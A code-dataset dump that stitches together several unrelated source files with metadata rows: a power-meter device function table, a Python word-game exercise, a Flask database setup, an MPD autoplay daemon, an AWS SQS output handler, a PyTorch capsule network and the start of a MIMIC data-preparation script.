func.valDef.max = 65536
func = Functions()
functions[5015] = func
func.guid = 5015
func.name = "MinTotalPower"
func.description = "Minimum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5016] = func
func.guid = 5016
func.name = "MinTotalPowerFactor"
func.description = "Minimum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5017] = func
func.guid = 5017
func.name = "MaxTotalPowerFactor"
func.description = "Maximum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10071] = func
func.guid = 10071
func.name = "ActiveTotalEnergyReset"
func.description = "Active Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10072] = func
func.guid = 10072
func.name = "ApparentTotalEnergyReset"
func.description = "Apparent Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[50010] = func
func.guid = 50010
func.name = "MonitorAutoRefresh"
func.description = "Get the monitor values from the module that are auto refreshed"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[40011] = func
func.guid = 40011
func.name = "Role"
func.description = "To see in which role you are logged in"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[40012] = func
func.guid = 40012
func.name = "UserLoginAndPassword"
func.description = "Contains 1 loginname and 1 password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 32
func = Functions()
functions[40014] = func
func.guid = 40014
func.name = "DoHotReset"
func.description = "Hot reset of the device"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
| 961 | 30 | 153 |
132be6fea7c50a7a170c4f9aa91f51ac86857654 | 576 | py | Python | Python/pyworkout/strings/ex7.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | Python/pyworkout/strings/ex7.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | 3 | 2020-03-24T16:26:35.000Z | 2020-04-15T19:40:41.000Z | Python/pyworkout/strings/ex7.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
main()
| 20.571429 | 57 | 0.600694 | def ubbi_dubbi(
word: str
) -> str:
if len(word) == 0:
return word
vowels = {'a', 'e', 'i', 'o', 'u'}
translated_word_letters = []
for letter in word:
if letter.lower() in vowels:
prefix_to_add = 'ub'
translated_word_letters.append(prefix_to_add)
translated_word_letters.append(letter)
translated_word = ''.join(translated_word_letters)
return translated_word
def main():
    """Prompt the user for a single word and print its Ubbi Dubbi form."""
    word_to_translate = input('Enter a word to translate: ')
    translated = ubbi_dubbi(word_to_translate)
    print(translated)


if __name__ == '__main__':
    main()
| 490 | 0 | 45 |
6fd23260949277ea92d89c10373634f8d0942f55 | 228 | py | Python | app_backend/databases/bearing.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 1 | 2020-06-21T04:08:26.000Z | 2020-06-21T04:08:26.000Z | app_backend/databases/bearing.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 13 | 2019-10-18T17:19:32.000Z | 2022-01-13T00:44:43.000Z | app_backend/databases/bearing.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 5 | 2019-02-07T03:15:16.000Z | 2021-09-04T14:06:28.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: bearing.py
@time: 2020-02-29 23:23
"""
from flask_sqlalchemy import SQLAlchemy
from app_backend import app
db_bearing = SQLAlchemy(app)
| 13.411765 | 39 | 0.732456 | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: bearing.py
@time: 2020-02-29 23:23
"""
from flask_sqlalchemy import SQLAlchemy
from app_backend import app
db_bearing = SQLAlchemy(app)
| 0 | 0 | 0 |
627df465bd86b19b5a94d072b880cccd05eaaae8 | 15,404 | py | Python | jukio/autoplay.py | tomow1/jukio | 5e3e8b06c1350d76c7d1a2e4cca7d9387687256e | [
"MIT"
] | null | null | null | jukio/autoplay.py | tomow1/jukio | 5e3e8b06c1350d76c7d1a2e4cca7d9387687256e | [
"MIT"
] | null | null | null | jukio/autoplay.py | tomow1/jukio | 5e3e8b06c1350d76c7d1a2e4cca7d9387687256e | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Keeps your MPD playlist filled with music you like
Dependencies : python-mpd
pysqlite
'''
import os
import mpd
import random
import sqlite3
import time
import io
import sys
import socket
## Config
playtime = 70 # Percentage of a song that must be played before
# play count is incremented
mintime = 25 # Minimum length of a track for it
# to be considered a song (in seconds)
flood_delay = 12*60 # Minutes to wait before adding the same song again
tries = 10 # Retry connecting this many times
## /Config
version = "2.0 DEV"
helpstring = """Syntax : """ + sys.argv[0] + """ [command]
command can be one of :
radio [on|off|toggle]
trigger [number]
info [path]
start
stop (synonym: kill)
loglevel [debug|notice|warning|error]
help
version"""
enc = sys.getfilesystemencoding()
#enc = "UTF-8"
def log(msg, stdout=False):
"""Logs to file, and optionally to stdout. Obvious enough"""
alllevels = "DINWE" # Debug, Info, Notice, Warning, Error
loglevels = alllevels[alllevels.find(logLevel):]
if stdout:
print msg[2:]
if msg[0] in loglevels:
logio.write(unicode(msg, enc)+"\n")
def addsong():
    """Adds a semi-random song to the playlist"""
    # Random karma threshold in [-0.5, 2): songs with higher karma clear it
    # more often and are therefore queued more frequently.
    rand = random.uniform(-0.5, 2)
    # Pick one random eligible song: karma above the threshold, last queued
    # before the anti-flood cutoff, and not flagged as a duplicate file.
    # NOTE(review): ``trigger`` (module global, see the CLI "trigger"
    # command) shortens the flood window -- confirm intended semantics.
    cursor.execute("SELECT file, listened, added FROM songs "
                   "WHERE karma>? AND time < ? "
                   "AND NOT duplicate ORDER BY random() LIMIT 1;",
                   (rand, int(time.time()-(60*(flood_delay-trigger*3)))))
    songdata = cursor.fetchone()  # (file, listened, added) or None
    if not songdata:
        # No candidate matched: refresh one song's stats, then retry
        # recursively until a song can be added.
        updateone()
        addsong()
    else:
        # Bump the "added" counter and recompute karma for the chosen song.
        newkarma = karma(songdata[1], songdata[2]+1)
        cursor.execute(
            "UPDATE songs SET added=?, karma=?, time=? WHERE file=?",
            (songdata[2]+1, newkarma, int(time.time()), songdata[0],)
        )
        # If the song is known by inode/device, apply the same update to
        # every row pointing at the same physical file (hard links).
        cursor.execute(
            "SELECT inode, dev FROM songs WHERE file=?;",
            (songdata[0],)
        )
        one = cursor.fetchone()
        if one and one[0]:
            cursor.execute(
                """UPDATE SONGS SET added=?, karma=?, time=? WHERE inode=?
                AND dev=?""", (songdata[2]+1, newkarma, int(time.time()),
                one[0], one[1])
            )
        db.commit()
        try:
            # Queue the song in MPD; stored paths are unicode, MPD wants
            # the filesystem encoding.
            client.add(songdata[0].encode(enc))
            log("I Added " + songdata[0].encode(enc))
            log("D A:" + str(songdata[2]+1) + ", K:" +
                str(newkarma))
        except mpd.CommandError:
            # MPD rejected the path (file gone or renamed): refresh the DB
            # entry for it and pick another song instead.
            log("W Couldn't add " + songdata[0].encode(enc))
            update(songdata[0])
            addsong()
# --- Module-level state and environment setup --------------------------
allsongs = []   # NOTE(review): not used in this chunk; presumably filled
                # by the library-scanning code elsewhere -- confirm.
logLevel = "D"  # default verbosity: Debug (most verbose), see log()
# Per-user data directory, honouring XDG_DATA_HOME with the usual fallback.
datahome = (os.getenv("XDG_DATA_HOME") or os.getenv("HOME") +
            "/.local/share") + "/autoplay"
if not os.access(datahome, os.W_OK):
    try:
        os.makedirs(datahome)
    except os.error:
        log("E Couldn't access nor create" + datahome + ", quitting", True)
        exit(2)
# MPD connection settings from the environment; MPD_HOST may embed a
# password in the form "password@host".
password = None
host = os.getenv("MPD_HOST", "127.0.0.1")
atloc = host.find("@")
if(atloc != -1):
    password = host[:atloc]
    host = host[atloc+1:]
port = os.getenv("MPD_PORT", "6600")
musicdir = os.getenv("MPD_MUSIC_DIR") or os.getenv("mpd_music_dir")
# Line-buffered logfile, opened once for the whole process lifetime.
logio = io.open(datahome + "/log", "at", buffering=1, encoding=enc)
if __name__ == "__main__":
    # Client mode: forward the command-line arguments to the running
    # daemon over its control socket and echo the reply.  The "start"
    # command is excluded from this forwarding.
    silent = False
    s = getServSock()  # NOTE(review): defined elsewhere in this file
    try:
        if len(sys.argv) <= 1 or sys.argv[1] != "start":
            s.sendall(" ".join(sys.argv[1:]) + "\n")
            data = s.recv(1024)
            while data != "":  # empty string == peer closed the socket
                print data,
                data = s.recv(1024)
    except KeyboardInterrupt:
        pass
    s.shutdown(socket.SHUT_RDWR)
    s.close()
# vim: tw=70 ts=2 sw=2
| 28.57885 | 91 | 0.573358 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Keeps your MPD playlist filled with music you like
Dependencies : python-mpd
pysqlite
'''
import os
import mpd
import random
import sqlite3
import time
import io
import sys
import socket
## Config
playtime = 70 # Percentage of a song that must be played before
# play count is incremented
mintime = 25 # Minimum length of a track for it
# to be considered a song (in seconds)
flood_delay = 12*60 # Minutes to wait before adding the same song again
tries = 10 # Retry connecting this many times
## /Config
version = "2.0 DEV"
helpstring = """Syntax : """ + sys.argv[0] + """ [command]
command can be one of :
radio [on|off|toggle]
trigger [number]
info [path]
start
stop (synonym: kill)
loglevel [debug|notice|warning|error]
help
version"""
enc = sys.getfilesystemencoding()
#enc = "UTF-8"
def log(msg, stdout=False):
"""Logs to file, and optionally to stdout. Obvious enough"""
alllevels = "DINWE" # Debug, Info, Notice, Warning, Error
loglevels = alllevels[alllevels.find(logLevel):]
if stdout:
print msg[2:]
if msg[0] in loglevels:
logio.write(unicode(msg, enc)+"\n")
def connect(i=1):
log("N Connecting...")
if i == tries:
log("E Could not connect to server D:", stdout=True)
exit(1)
try:
client.connect(host, port)
except socket.error:
log("N Try n°"+str(i)+" failed")
time.sleep(i*3)
connect(i+1)
return
if password:
try:
log("D Using password")
client.password(password)
except mpd.CommandError:
log("E Couldn't connect. Wrong password?", stdout=True)
exit(2)
log("N Connected")
def addsong():
"""Adds a semi-random song to the playlist"""
rand = random.uniform(-0.5, 2)
cursor.execute("SELECT file, listened, added FROM songs "
"WHERE karma>? AND time < ? "
"AND NOT duplicate ORDER BY random() LIMIT 1;",
(rand, int(time.time()-(60*(flood_delay-trigger*3)))))
songdata = cursor.fetchone()
if not songdata:
updateone()
addsong()
else:
newkarma = karma(songdata[1], songdata[2]+1)
cursor.execute(
"UPDATE songs SET added=?, karma=?, time=? WHERE file=?",
(songdata[2]+1, newkarma, int(time.time()), songdata[0],)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(songdata[0],)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET added=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[2]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
try:
client.add(songdata[0].encode(enc))
log("I Added " + songdata[0].encode(enc))
log("D A:" + str(songdata[2]+1) + ", K:" +
str(newkarma))
except mpd.CommandError:
log("W Couldn't add " + songdata[0].encode(enc))
update(songdata[0])
addsong()
def karma(listened, added):
if listened == 0: listened = 0.1
if added == 0: added = 0.1
return float(listened)/added
def listened(file):
update(file);
try:
cursor.execute("SELECT listened, added FROM songs WHERE file = ?",
(file,))
songdata = cursor.fetchone()
newkarma = karma(songdata[0]+1, songdata[1])
cursor.execute(
"UPDATE songs SET listened=?, karma=?, time=? WHERE file=?",
(songdata[0]+1, newkarma, int(time.time()), file)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(file,)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET listened=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[0]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
log("I Listened to " + file.encode(enc))
log("D L:" + str(songdata[0]+1) + ", K:" +str(newkarma))
except (KeyError, TypeError): # on songdata[n]
pass
allsongs = []
def updateone():
if allsongs == []:
cursor.execute("VACUUM;")
for song in client.list("file"):
allsongs.append(unicode(song, enc))
for song in cursor.execute("SELECT file FROM songs;"):
allsongs.append(song[0])
random.shuffle(allsongs)
song = allsongs.pop()
update(song)
def update(song):
# Check if the file is in mpd
records = client.search("filename", song.encode(enc))
if not any(unicode(r['file'], enc) == song for r in records):
log("N Update : Removing " + song.encode(enc))
cursor.execute("delete from songs where file=?", (song,))
db.commit()
return
inode = dev = None
duplicate = False
listened, added, karma = 0, 0, 5
if musicdir:
# Check for duplicate in FS
try:
s = os.stat(musicdir + "/" + song.encode(enc))
inode = s.st_ino
dev = s.st_dev
cursor.execute("SELECT listened, added, karma FROM songs WHERE file!=? AND inode=?" +
"AND dev=? AND NOT duplicate;", (song, inode, dev))
one = cursor.fetchone();
if one:
duplicate=True
listened, added, karma = one
cursor.execute("""UPDATE songs SET listened=?, added=?, karma=?,
inode=?, dev=?, duplicate=? WHERE file=?""",
(listened, added, karma, inode, dev, duplicate, song))
else:
cursor.execute("""UPDATE songs SET inode=?, dev=?, duplicate=? WHERE file=?""",
(inode, dev, duplicate, song))
except OSError:
log("E Couldn't stat " + musicdir + "/" + song.encode(enc))
pass
# Check if the file is in DB
cursor.execute("SELECT 1 FROM songs WHERE file=?", (song,))
if cursor.fetchone() == None:
log("N Update : Adding " + song.encode(enc))
cursor.execute("INSERT INTO songs"+
"(file, listened, added, karma, time, inode, dev, duplicate)"+
"VALUES (?, ?, ?, ?, 0, ?, ?, ?);",
(song, listened, added, karma, inode, dev, duplicate))
db.commit()
def getSetting(name, default=None):
cursor.execute("""SELECT value FROM setting
WHERE name = ?;""", (name,))
one = cursor.fetchone()
if not one and default:
setSetting(name, default)
return default
if not one: return None
return one[0]
def setSetting(name, val):
val = str(val)
if getSetting(name) == None:
cursor.execute("""INSERT INTO setting (name, value)
VALUES (?, ?);""", (name, val))
else:
cursor.execute("""UPDATE setting SET value = ?
WHERE name = ?;""", (val, name))
db.commit()
def initDB():
cursor.execute("""CREATE TABLE IF NOT EXISTS setting(
name text not null,
value text
);""")
cursor.execute("""CREATE TABLE IF NOT EXISTS songs(
file text not null,
listened int not null default 0,
added int not null default 0,
karma real not null default 5,
time int not null default 0,
inode int,
dev int,
duplicate boolean not null default 0
);""")
db.commit()
dbversion = getSetting("dbversion")
cursor.execute("""SELECT 1 FROM songs LIMIT 1;""")
if cursor.fetchone() and not dbversion: # old db
setSetting("dbversion", "1")
elif not dbversion:
setSetting("dbversion", "3")
else:
if int(dbversion) < 2:
cursor.execute("""ALTER TABLE songs ADD COLUMN inode int;""")
cursor.execute("""ALTER TABLE songs ADD COLUMN dev int;""")
setSetting("dbversion", "2")
if int(dbversion) < 3:
cursor.execute("""ALTER TABLE songs ADD COLUMN duplicate boolean
not null default 0;""")
setSetting("dbversion", "3")
db.commit()
def shutdown():
s.shutdown(socket.SHUT_RDWR)
s.close()
os.unlink(datahome + "/socket")
client.disconnect()
os.unlink(datahome + "/pid")
log("N Shutdown")
def triggerStatus():
return "Trigger : " + str(trigger) + "\n"
def radioStatus():
return "Radio mode : " +\
("Enabled" if radioMode else "Disabled") + "\n"
def pprintSong(file=None):
try:
if not file:
song = client.currentsong()
else:
song = client.find("file", file.encode(enc))[0]
cursor.execute("""SELECT listened, added, karma FROM songs
WHERE file = ?""", (unicode(song['file'], enc),))
one = cursor.fetchone()
if not one:
return "\n"
prettysong = song['file']
try:
prettysong = song['title']
prettysong = song['artist'] + " - " + prettysong
except (KeyError, TypeError): pass
return prettysong + """
Listened : """ + str(one[0]) + """
Added : """ + str(one[1]) + """
Karma : """ + str(one[2]) + "\n"
except (IndexError, KeyError, mpd.ConnectionError):
return "\n";
def sockAccept():
global client, db, cursor, s
global trigger, radioMode, logLevel
global allsongs
try: #Socket error
c, _ = s.accept()
c.settimeout(1)
comm = ""
try:
while comm[-1:] != "\n":
comm += c.recv(1024)
except socket.error:
comm=""
c.settimeout(0)
comm = comm[:-1]
if len(comm) != 0:
if comm == "kill" or comm == "stop":
c.send("Shutting down server...\n")
c.shutdown(socket.SHUT_RD)
c.close()
shutdown()
exit(0)
elif comm[:5] == "radio":
if comm[6:] in ("off", "no", "stop"): radioMode = False
elif comm[6:] in ("on", "yes", "start"): radioMode = True
elif comm[6:] == "toggle": radioMode = not radioMode
elif comm[5:6] == " ": c.send("Syntax: autoplay radio [on|off|toggle]\n")
c.send(radioStatus())
setSetting("radioMode", str(radioMode))
elif comm[:7] == "trigger":
try:
trigger = int(comm[8:])
setSetting("trigger", str(trigger))
except ValueError:
if comm[7:8] == " ":
c.send("\"" + comm[8:] + "\" is not a valid number")
c.send(triggerStatus())
elif comm[:8] == "loglevel":
if comm[9:].lower() in ("d", "debug"): logLevel = "D"
elif comm[9:].lower() in ("n", "notice"): logLevel = "N"
elif comm[9:].lower() in ("w", "warning"): logLevel = "W"
elif comm[9:].lower() in ("e", "error"): logLevel = "E"
elif comm[8:9] == " ":
c.send("Syntax: autoplay loglevel [debug|notice|warning|error]\n")
c.send("Log level : " + logLevel + "\n")
setSetting("logLevel", logLevel)
elif comm[:4] == "info":
if comm[4:] != "": c.send(pprintSong(comm[5:]))
else: c.send(pprintSong())
elif comm[:6] == "update":
if comm[7:] == "all":
c.send("This may be *very* long, depending on the size of your"
+ " library.\n")
allsongs = []
updateone()
c.send(str(len(allsongs) + 1) + " songs to update\n\n" )
while allsongs != []:
if len(allsongs) % 200 == 0:
c.send(str(len(allsongs)) + " remaining...\n")
updateone()
c.send("Done")
else:
update(unicode(comm[7:],enc))
elif comm in ("help","-h","--help"):
c.send(helpstring + "\n\n")
elif comm in ("version", "-V"):
c.send("Autoplay v" + version + "\n")
else:
log("W Unknown command : " + comm)
c.send("Unknown command : " + comm + "\n")
c.send(helpstring + "\n")
else:
c.send(radioStatus())
if radioMode: c.send(triggerStatus())
c.shutdown(socket.SHUT_RDWR)
c.close()
return True;
except socket.error:
return False;
def serve():
global client, db, cursor, s
global trigger, radioMode, logLevel
global allsongs
s = socket.socket(socket.AF_UNIX)
s.bind(datahome + "/socket")
s.settimeout(.3)
s.listen(2)
db = sqlite3.connect((datahome+"/db.sqlite").encode(enc))
cursor = db.cursor()
initDB()
logLevel = getSetting("logLevel", "W")
radioMode = getSetting("radioMode", "True") == "True"
trigger = int(getSetting("trigger", 6))
random.seed()
client = mpd.MPDClient()
connect()
armed = True
lastUpdate = 0
lastMpd = time.time()
log("D Music dir is located at " + str(musicdir))
log("N Ready")
while True:
try: #KeyboardInterrupt
if sockAccept():
lastUpdate = lastMpd = time.time()
next
try: #MPD or socket error
clock = time.time()
if clock - lastUpdate >= 5:
lastUpdate = clock
updateone()
if clock - lastMpd >= .6:
lastMpd = clock
if radioMode:
if client.status()["consume"] == "0":
cursongid = client.status()["songid"]
for song in client.playlistid():
if song["id"] == cursongid:
neededlength = int(song["pos"]) + trigger
else:
neededlength = trigger
if len(client.playlist()) < neededlength:
addsong()
lastMpd = 0
if client.status()['state'] == "play":
times = client.status()['time'].split(":")
pos = int(times[0])
end = int(times[1])
currentsong = client.currentsong()
if not armed and "id" in currentsong and not songid == currentsong["id"]:
armed = True
elif armed and (end > mintime) and (pos > playtime*end/100):
armed = False # Disarm until the next song
listened(unicode(currentsong["file"], enc))
songid = (currentsong["id"])
except (KeyError, TypeError):
pass
except (socket.error, mpd.ConnectionError):
log("W Connection to MPD lost")
client.disconnect()
connect()
except KeyboardInterrupt:
s.shutdown(socket.SHUT_RDWR)
def getServSock():
try:
pidf = open(datahome + "/pid") #IOError
pid = pidf.read()
pidf.close()
os.kill(int(pid), 0) #OSError on kill, ValueError on int
except (IOError, OSError, ValueError):
print("Starting server...")
try:
os.unlink(datahome + "/socket")
except OSError:
pass
pid = os.fork()
if pid == 0:
serve()
pidf = open(datahome + "/pid", "w")
pidf.write(str(pid))
pidf.close()
s = socket.socket(socket.AF_UNIX)
try:
s.connect(datahome + "/socket")
except socket.error:
try:
s = getServSock()
except RuntimeError: # recursion
log("E Couldn't connect to socket", True)
exit(1)
return s
logLevel = "D"
datahome = (os.getenv("XDG_DATA_HOME") or os.getenv("HOME") +
"/.local/share") + "/autoplay"
if not os.access(datahome, os.W_OK):
try:
os.makedirs(datahome)
except os.error:
log("E Couldn't access nor create" + datahome + ", quitting", True)
exit(2)
password = None
host = os.getenv("MPD_HOST", "127.0.0.1")
atloc = host.find("@")
if(atloc != -1):
password = host[:atloc]
host = host[atloc+1:]
port = os.getenv("MPD_PORT", "6600")
musicdir = os.getenv("MPD_MUSIC_DIR") or os.getenv("mpd_music_dir")
logio = io.open(datahome + "/log", "at", buffering=1, encoding=enc)
if __name__ == "__main__":
silent = False
s = getServSock()
try:
if len(sys.argv) <= 1 or sys.argv[1] != "start":
s.sendall(" ".join(sys.argv[1:]) + "\n")
data = s.recv(1024)
while data != "":
print data,
data = s.recv(1024)
except KeyboardInterrupt:
pass
s.shutdown(socket.SHUT_RDWR)
s.close()
# vim: tw=70 ts=2 sw=2
| 11,557 | 0 | 344 |
dc4f791b106666858e2a4f2913316894e07b0ff6 | 2,528 | py | Python | igata/handlers/aws/output/sqs.py | kiconiaworks/igata | 1d8a4b82a65eb936d5d8f8ff70747ba82ddef31a | [
"BSD-2-Clause"
] | 1 | 2021-12-31T14:29:44.000Z | 2021-12-31T14:29:44.000Z | igata/handlers/aws/output/sqs.py | kiconiaworks/igata | 1d8a4b82a65eb936d5d8f8ff70747ba82ddef31a | [
"BSD-2-Clause"
] | 6 | 2019-11-25T04:20:26.000Z | 2021-12-13T05:23:16.000Z | igata/handlers/aws/output/sqs.py | kiconiaworks/igata | 1d8a4b82a65eb936d5d8f8ff70747ba82ddef31a | [
"BSD-2-Clause"
] | null | null | null | import json
import logging
from collections import Counter
from typing import Union
import boto3
from .... import settings
from . import OutputCtxManagerBase
logger = logging.getLogger("cliexecutor")
SQS = boto3.client("sqs", endpoint_url=settings.SQS_ENDPOINT, region_name="ap-northeast-1")
class SQSRecordOutputCtxManager(OutputCtxManagerBase):
"""Predictor.predict() resutls will use `put_records()` to output to the envar defined SQS Queue"""
@classmethod
def required_kwargs(cls) -> tuple:
"""
Define the required fields for Class instantiation.
Fields defined here can be used as environment variables by prefixing the value with 'OUTPUT_CTXMGR_' and putting values in uppercase.
Ex:
OUTPUT_CTXMGR_SQS_QUEUE_URL
"""
required = ("sqs_queue_url",)
return required
def put_records(self, records: Union[dict, list]):
"""
Call to send result defined in JSON parsable `message_body` to SQS.
.. note::
given `message_body` will be converted to JSON and sent to the defined SQS Queue.
"""
summary = Counter()
max_sqs_message_body_bytes = 2048
for record in records:
message_body_json = json.dumps(record)
message_body_utf8_bytes = len(message_body_json.encode("utf8"))
logger.info(f"Message Bytes={message_body_utf8_bytes}")
if message_body_utf8_bytes > max_sqs_message_body_bytes:
logger.error(f"message_body_utf8_bytes({message_body_utf8_bytes}) > max_sqs_message_body_bytes({max_sqs_message_body_bytes})")
logger.debug(f"Queuing({self.sqs_queue_url}): {record}")
response = SQS.send_message(QueueUrl=self.sqs_queue_url, MessageBody=message_body_json)
logger.debug(f"response: {response}")
summary["sent_messages"] += 1
return summary
| 37.731343 | 142 | 0.676424 | import json
import logging
from collections import Counter
from typing import Union
import boto3
from .... import settings
from . import OutputCtxManagerBase
logger = logging.getLogger("cliexecutor")
SQS = boto3.client("sqs", endpoint_url=settings.SQS_ENDPOINT, region_name="ap-northeast-1")
class SQSRecordOutputCtxManager(OutputCtxManagerBase):
"""Predictor.predict() resutls will use `put_records()` to output to the envar defined SQS Queue"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.sqs_queue_url = kwargs.get("sqs_queue_url", None)
assert self.sqs_queue_url.startswith("http")
@classmethod
def required_kwargs(cls) -> tuple:
"""
Define the required fields for Class instantiation.
Fields defined here can be used as environment variables by prefixing the value with 'OUTPUT_CTXMGR_' and putting values in uppercase.
Ex:
OUTPUT_CTXMGR_SQS_QUEUE_URL
"""
required = ("sqs_queue_url",)
return required
def put_records(self, records: Union[dict, list]):
"""
Call to send result defined in JSON parsable `message_body` to SQS.
.. note::
given `message_body` will be converted to JSON and sent to the defined SQS Queue.
"""
summary = Counter()
max_sqs_message_body_bytes = 2048
for record in records:
message_body_json = json.dumps(record)
message_body_utf8_bytes = len(message_body_json.encode("utf8"))
logger.info(f"Message Bytes={message_body_utf8_bytes}")
if message_body_utf8_bytes > max_sqs_message_body_bytes:
logger.error(f"message_body_utf8_bytes({message_body_utf8_bytes}) > max_sqs_message_body_bytes({max_sqs_message_body_bytes})")
logger.debug(f"Queuing({self.sqs_queue_url}): {record}")
response = SQS.send_message(QueueUrl=self.sqs_queue_url, MessageBody=message_body_json)
logger.debug(f"response: {response}")
summary["sent_messages"] += 1
return summary
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
# make sure that any remaining records are put
# --> records added byt the `` defined in OutputCtxManagerBase where self._record_results is populated
if self._record_results:
logger.debug(f"put_records(): {len(self._record_results)}")
self.put_records(self._record_results)
| 529 | 0 | 81 |
e9e1e37dad186954ae5ac1b1729fca8e3c617b7a | 1,768 | py | Python | capsule/net.py | VIVelev/capsnets | dca4bfcd4007977a6bc3534a4676880326fcf94a | [
"MIT"
] | null | null | null | capsule/net.py | VIVelev/capsnets | dca4bfcd4007977a6bc3534a4676880326fcf94a | [
"MIT"
] | null | null | null | capsule/net.py | VIVelev/capsnets | dca4bfcd4007977a6bc3534a4676880326fcf94a | [
"MIT"
] | 1 | 2019-11-03T09:39:49.000Z | 2019-11-03T09:39:49.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import ConvLayer, Decoder, DigitCaps, PrimaryCaps
__all__ = [
'CapsNet',
]
class CapsNet(nn.Module):
'''Capsule Network'''
@staticmethod
@staticmethod
@staticmethod
| 34 | 124 | 0.662896 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import ConvLayer, Decoder, DigitCaps, PrimaryCaps
__all__ = [
'CapsNet',
]
class CapsNet(nn.Module):
'''Capsule Network'''
def __init__(self, num_capsules=10, in_channels=1, num_inputs_per_capsule=32*6*6, out_dim=28*28, cuda=False):
super(CapsNet, self).__init__()
CapsNet.num_capsules = num_capsules
self.conv_layer = ConvLayer(in_channels=in_channels)
self.primary_capsules = PrimaryCaps()
self.digit_capsules = DigitCaps(num_capsules=num_capsules, num_inputs_per_capsule=num_inputs_per_capsule, cuda=cuda)
self.decoder = Decoder(num_capsules=num_capsules, out_dim=out_dim)
def forward(self, x, y=None):
x = self.conv_layer(x)
x = self.primary_capsules(x)
x = self.digit_capsules(x)
reconstruction = self.decoder(x, y)
return x, x.norm(dim=-1), reconstruction
@staticmethod
def loss(output, targets, reconstruction, images):
return CapsNet.margin_loss(output, targets) + \
CapsNet.reconstruction_loss(reconstruction, images)
@staticmethod
def margin_loss(output, targets, lmbd=0.5, m_plus=0.9, m_minus=0.1):
targets = F.one_hot(targets, CapsNet.num_capsules).float()
left = torch.clamp(m_plus - output, min=0)**2
right = torch.clamp(output - m_minus, min=0)**2
loss = targets * left + lmbd*(1 - targets) * right
return loss.sum(dim=1).mean()
@staticmethod
def reconstruction_loss(reconstruction, images, criterion=nn.MSELoss(), alpha=0.0005):
return alpha*criterion(reconstruction, images.view(reconstruction.size(0), -1))
| 1,352 | 0 | 136 |
b5c3cdefd2b6a2c429eb27b4ed87e962300b20ff | 17,030 | py | Python | codes/PrepareDataset.py | yanda-wang/ARMGA | f2dcade00b1271e5814dacaa2b6f9de63ea7077a | [
"BSD-3-Clause"
] | 4 | 2021-03-23T23:37:03.000Z | 2022-01-13T01:13:28.000Z | codes/PrepareDataset.py | yanda-wang/ARMGA | f2dcade00b1271e5814dacaa2b6f9de63ea7077a | [
"BSD-3-Clause"
] | null | null | null | codes/PrepareDataset.py | yanda-wang/ARMGA | f2dcade00b1271e5814dacaa2b6f9de63ea7077a | [
"BSD-3-Clause"
] | null | null | null | import csv
import dill
import itertools
import math
import pandas as pd
import numpy as np
from itertools import combinations
from sklearn.model_selection import train_test_split
from tqdm import tqdm
med_file = 'data/PRESCRIPTIONS.csv'
diag_file = 'data/DIAGNOSES_ICD.csv'
procedure_file = 'data/PROCEDURES_ICD.csv'
ndc2atc_file = 'data/ndc2atc_level4.csv'
cid_atc = 'data/drug-atc.csv'
ndc2rxnorm_file = 'data/ndc2rxnorm_mapping.txt'
